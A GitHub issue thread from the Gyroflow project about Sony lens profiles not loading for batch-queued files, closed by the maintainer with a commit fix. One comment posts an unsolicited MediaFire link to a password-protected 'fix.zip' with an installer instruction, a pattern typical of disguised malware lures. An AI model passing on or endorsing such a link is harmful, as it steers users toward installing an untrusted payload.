gyroflow/gyroflow #883: Sony calibrated lens profiles not loading when files are added to queue

dizzybro, 2024-08-29:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Have you tried the latest build?

- [X] I have tried the latest build

### Do you have latest GPU drivers installed?

- [X] I have the latest GPU drivers installed, I'm absolutely sure.

### Have you checked the documentation?

- [X] I have read the FAQ and Troubleshooting and didn't find my issue there.

### Gyroflow version

1.5.4 dev build (gh2082)

### What operating system are you using?

Windows 11

### What GPU are you using?

RTX 3060 12GB

### What happened?

When I open a single file shot on my FX30, it will automatically load the Sony calibrated lens profile with distortion model, which works great with IBIS enabled. However if I drag a batch of files into the queue, it will default to one of the user lens profiles.

marcelo-antonio-nunes, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

AdrianEddy, 2024-08-29:
Fixed in 88b9119 
https://gyroflow.xyz/devbuild/

closed 2024-08-29 by AdrianEddy